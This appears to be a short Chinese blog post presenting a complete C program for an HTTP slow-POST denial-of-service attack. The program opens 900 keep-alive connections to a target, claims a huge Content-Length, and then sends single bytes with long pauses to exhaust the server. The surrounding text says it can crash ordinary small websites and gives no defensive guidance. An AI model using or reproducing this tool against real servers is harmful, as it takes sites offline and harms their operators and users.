say sorry to WEB(http)

spyhjl

http 的DDOS的攻击应该引起重视.
下面的代码简单的展示了WEB的攻击原理：

1. #include <stdio.h>
   
2. #include <sys/socket.h>
   
3. #include <sys/types.h>
   
4. #include <string.h>
   
5. #include <arpa/inet.h>
   
6. #include <errno.h>
   
7. #include <stdlib.h>
   
8. #include <unistd.h>
   
9. 
   
10. #if 1
    
11. char buf[] = "POST /a HTTP/1.1\r\nHost: www.xxxx.com\r\nUser-Agent: Mozilla/5.0 (X11; U; Linux x86_64; zh_CN; rv:1.9.0.3) Gecko/2010072118 Firefox/3.0.3\r\nKeep-Alive: 900\r\nConnection: keep-alive\r\nContent-Length: 100000000\r\nContent-Type: application/x-www-form-urlencoded;charset=UTF-8\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: zh-cn,zh;q=0.5\r\nAccept-Encoding: gzip,deflate\r\nAccept-Charset: gb2312,utf-8;q=0.7,*;q=0.7\r\nPragma: no-cache\r\nCache-Control: no-cache\r\n\r\n";
    
12. #endif
    
13. 
    
14. #if 0
    
15. char buf[] = "GET / HTTP/1.1\r\nHost: www.xxx.xxx.com\r\nUser-Agent: Mozilla/5.0 (X11; U; Linux x86_64; zh_CN; rv:1.9.0.3) Gecko/2010072118 Firefox/3.0.3\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: zh-cn,zh;q=0.5\r\nAccept-Encoding: gzip,deflate\r\nAccept-Charset: gb2312,utf-8;q=0.7,*;q=0.7\r\nKeep-Alive: 300\r\nConnection: keep-alive\r\nif-Modified-Since: Thu, 25 Aug 2011 02:30:24 GMT\r\n\r\n";
    
16. #endif
    
17. 
    
18. int main(int argc, char *argv[])
    
19. {
    
20.     int fd;
    
21.     struct sockaddr_in ser;
    
22.     socklen_t lenth;
    
23.     int num = 900;
    
24.     int fd_buf[num];
    
25.     
    
26.     memset(&ser, 0, sizeof(ser));
    
27.     ser.sin_family = AF_INET;
    
28.     ser.sin_port = htons(80);
    
29.     ser.sin_addr.s_addr = inet_addr("172.16.0.254");
    
30. 
    
31.     printf(buf);
    
32.     int i, num_data;
    
33.     for(i = 0; i< num; i++){
    
34.         if((fd = socket(AF_INET, SOCK_STREAM, 0)) < 0){
    
35.                 fprintf(stderr, "socket fail:%s\n", strerror(errno));
    
36.             exit(1);
    
37.         }
    
38. 
    
39.         lenth = sizeof(ser);
    
40.         if((connect(fd, (struct sockaddr*)&ser, sizeof(ser))) != 0){
    
41.             fprintf(stderr, "connect fail:%s\n", strerror(errno));
    
42.             exit(1);
    
43.         }
    
44. 
    
45.         fd_buf[i] = fd;
    
46.         num_data = write(fd, buf, sizeof(buf) - 1);
    
47.         printf("write num:%d\n", num_data);
    
48. 
    
49.     }
    
50. 
    
51.     while(1){
    
52.         for(i = 0; i < num; i++){
    
53.             write(fd_buf[i], "a", 1);
    
54.             sleep(100);
    
55.         }
    
56.     }
    
57. 
    
58.     return 0;
    
59. }

上面的代码很简单，攻击程序的代码以想相当小的负荷却足以让一般小型的网站崩溃。